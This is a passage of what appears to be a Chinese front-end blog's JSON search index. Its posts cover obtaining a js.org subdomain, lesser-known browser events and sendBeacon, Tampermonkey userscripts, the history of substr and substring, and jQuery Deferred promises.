requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。\n","permalink":"https://wdd.js.org/posts/2018/01/how-to-get-jsorg-sub-domain/","summary":"之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。","title":"组织在召唤:如何免费获取一个js.org的二级域名"},{"content":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4. navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/01/browser-events/","summary":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4.","title":"不常用却很有妙用的事件及方法"},{"content":" 当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行\n","permalink":"https://wdd.js.org/posts/2018/01/tampermonkey/","summary":"当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行","title":"油猴子脚本 - 我的地盘我做主"},{"content":" 引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.1. 在C++中首次出现substr() 在c语言中,并没有出现substr或者substring方法。然而在1983,substr()方法已经出现在C++语言中了。然而这时候还没有出现substring, 所以可以见得:substr是stustring的老大哥\nstring substr (size_t pos = 0, size_t len = npos) const; 从C++的方法定义中可以看到, substr的参数是开始下标,以及字符串长度。\nstd::string str=\u0026#34;We think in generalities, but we live in details.\u0026#34;; std::string str2 = str.substr (3,5); // \u0026#34;think\u0026#34; 1.2. 在Java中首次出现substring() 距离substr()方法出现已经有了将近十年之隔,此间涌现一批后起之秀,如: Python, Ruby, VB之类,然而他们之中并没有stustring的基因,在Java的String类中,我们看到两个方法。从这两个方法之中我们可以看到:substring方法基本原型的参数是开始和结束的下标。\nString substring(int beginIndex) // 返回一个新的字符串,它是此字符串的一个子字符串。 String substring(int beginIndex, int endIndex) // 返回一个新字符串,它是此字符串的一个子字符串。 2. JavaScript的历史继承 1995年,网景公司招募了Brendan Eich,目的是将Scheme编程语言嵌入到Netscape Navigator中。在开始之前,Netscape Communications与Sun Microsystems公司合作,在Netscape Navigator中引入了更多的静态编程语言Java,以便与微软竞争用户采用Web技术和平台。网景公司决定,他们想创建的脚本语言将补充Java,并且应该有一个类似的语法,排除采用Perl,Python,TCL或Scheme等其他语言。为了捍卫对竞争性提案的JavaScript的想法,公司需要一个原型。 1995年5月,Eich在10天内写完。\n上帝用七天时间创造万物, Brendan Eich用10天时间创造了一门语言。或许用创造并不合适,因为JavaScript是站在了Perl,Python,TCL或Scheme等其他巨人的肩膀上而产生的。\nJavaScript并不像C那样出身名门,在贝尔实验室精心打造,但是JavaScript在往后的自然选择中,并没有因此萧条,反而借助于C,C++, Java, Perl,Python,TCL, Scheme优秀基因,进化出更加强大强大的生命力。\n因此可以想象,在10天之内,当Brendan Eich写到String的substr和substring方法时,或许他并没困惑着两个方法的参数应该如何设置,因为在C++和Java的实现中,已经有了类似的定义。 如果你了解历史,你就不会困惑现在。\n3. 所以,substr和substring究竟有什么不同? 如下图所示:substr和substring都接受两个参数,他们的第一个参数的含义是相同的,不同的是第二个参数。substr的第二个参数是到达结束点的距离,substring是结束的位置。\n4. 参考文献 维基百科:程式語言歷史 C++ std::string::substr JavaScript 如有不正确的地方,欢迎指正。\n","permalink":"https://wdd.js.org/posts/2018/01/substr-and-substring-history/","summary":"引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.","title":"追本溯源:substr与substring历史漫话"},{"content":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.resolve(data); }, error:function(data){ dfd.reject(data); } }); return dfd.promise(); }); //根据callId查询录音文件,不仅仅是异步请求可以做成Promise形式,任何函数都可以做成Promise形式 App.addMethod(\u0026#39;_getRecordingsByCallId\u0026#39;,function(callId){ var dfd = $.Deferred(), path = \u0026#39;/api/tenantcalls/\u0026#39;+callId+\u0026#39;/recordings\u0026#39;; App._sendRequest(path) .done(function(res){dfd.resolve(res);}) .fail(function(res){dfd.reject(res);}); return dfd.promise(); }); // 获取录音 App.addMethod(\u0026#39;getCallDetailRecordings\u0026#39;,function(callId){ App._getRecordingsByCallId(callId) .done(function(res){ // 获取结果后渲染数据 App.renderRecording(res); }) .fail(function(res){ App.error(res); }); }); 5. 注意事项 jQuery的Promise主要是用了jQquery的$.Derferred()方法,一些老版本的jquery并不支持此方法。 jQuery版本必须大于等于1.5,推荐使用1.11.3 6. 参考文献 jquery官方api文档 jquery维基百科文档 7. 最后 以上文章仅供参考,不包完全正确。欢迎评论,3q。\n","permalink":"https://wdd.js.org/posts/2018/01/jquery-deferred/","summary":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.","title":"熟练使用使用jQuery Promise (Deferred)"}] \ No newline at end of file diff --git a/index.xml b/index.xml index d6233b7db..828e8d625 100644 --- a/index.xml +++ b/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/tags/all/index.html b/tags/all/index.html index 2f33f87fc..7de704f71 100644 --- a/tags/all/index.html +++ b/tags/all/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/tags/all/index.xml b/tags/all/index.xml index ac18e802f..700571fbe 100644 --- a/tags/all/index.xml +++ b/tags/all/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/index.html b/vim/index.html index 8c2a7fbf8..b85ea72b7 100644 --- a/vim/index.html +++ b/vim/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/index.xml b/vim/index.xml index d475ced53..9ed2506a7 100644 --- a/vim/index.xml +++ b/vim/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/vim/stuck-in-error-msgfloat-window/index.html b/vim/stuck-in-error-msgfloat-window/index.html index 76d9af4d4..0043d825d 100644 --- a/vim/stuck-in-error-msgfloat-window/index.html +++ b/vim/stuck-in-error-msgfloat-window/index.html @@ -2,7 +2,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 @@ -11,7 +11,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 @@ -19,12 +19,12 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 -我只能学会解决并适应VIM, 并且接受VIM的所有挑战。">

困在coc错误弹窗中

请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。

因为错误提示只有一行,所以无法上下移动。

一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。

正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。

我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。

能解决困难,则学到东西。

否则就只能放弃VIM, 回到VScode的怀抱中。

但是,我已经习惯了不使用鼠标的快捷编辑方式。

我只能学会解决并适应VIM, 并且接受VIM的所有挑战。